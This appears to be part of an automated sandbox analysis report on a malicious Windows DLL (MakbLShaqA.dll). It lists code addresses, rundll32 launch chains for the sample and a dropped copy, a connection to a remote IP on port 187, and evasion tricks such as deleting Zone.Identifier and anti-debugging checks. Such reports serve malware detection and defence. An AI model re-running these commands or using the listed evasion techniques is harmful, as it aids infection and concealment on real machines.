                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F89384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F91F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8C158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F83F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F83345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F85923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F86B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F82309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F83502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F830F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F90ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F97ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F990BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F998BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F85AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F944AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8DAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8FEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F978A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F83C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8AC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F94E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8CC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F87283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F81C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F82654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F89A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8A048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F82043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F83845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F82A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03FA1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F95220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F89E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8D223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8EC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8E21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8F41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F91C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F88C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F81A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F8220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F84C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04205220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420F83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042078A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042044AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420ECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420DEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042108D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04207ED1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04210B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04202FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04204BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F758F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04211A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04201C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420E441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420CAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042090BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042098BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04210687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04204E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420D091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420AC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420AEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420A8F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420BEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420CCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04200ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0421292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420FD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04201F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420577E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04211343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420F14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04209DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04207BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042043B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420B1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04204D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04211193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420B397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420D99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041FA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420BFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042103F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_042125C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10041CAB appears 75 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10041DB8 appears 35 times
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: MakbLShaqA.dllVirustotal: Detection: 16%
                      Source: MakbLShaqA.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.cky",UWJouFROYqkt
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxdbowjvh\qaursesh.cky",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.cky",UWJouFROYqkt
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Sxdbowjvh\qaursesh.cky",Control_RunDLL
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@26/7@0/21
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04201B54 CreateToolhelp32Snapshot,
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10016810 LockResource,
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: MakbLShaqA.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: MakbLShaqA.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: MakbLShaqA.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: MakbLShaqA.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: MakbLShaqA.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10041D83 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10041DFD push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E11229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028D1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F81229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_041F1229 push eax; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1004D1EA LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: MakbLShaqA.dllStatic PE information: real checksum: 0xadad1 should be: 0xa7dab
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.ckyJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Sxdbowjvh\qaursesh.cky:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000C188 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 5680Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 2908Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6180Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100331CA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04201A80 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: svchost.exe, 0000000A.00000002.539081571.00000275BC262000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                      Source: rundll32.exe, 00000007.00000002.643460255.0000000002979000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.269137604.0000000002977000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.538766604.00000275B6A29000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.539065871.00000275BC24C000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.388458543.000002854C213000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.386773119.000002854C27D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.388692192.000002854C2ED000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.388621892.000002854C27D000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000007.00000002.643375653.0000000002954000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000C.00000002.642318002.000001E5D943E000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.642209081.0000026710C2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100441C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1004D1EA LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_02E2DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_028EDE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_03F9DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0420DE10 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_100441C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1004A1EC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1003F29E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 51.178.61.60 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
                      Source: rundll32.exe, 00000007.00000002.643780071.0000000002DE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: rundll32.exe, 00000007.00000002.643780071.0000000002DE0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: rundll32.exe, 00000007.00000002.643780071.0000000002DE0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: rundll32.exe, 00000007.00000002.643780071.0000000002DE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: rundll32.exe, 00000007.00000002.643780071.0000000002DE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10048D61 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_1000BFE6 _memset,GetVersionExA,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
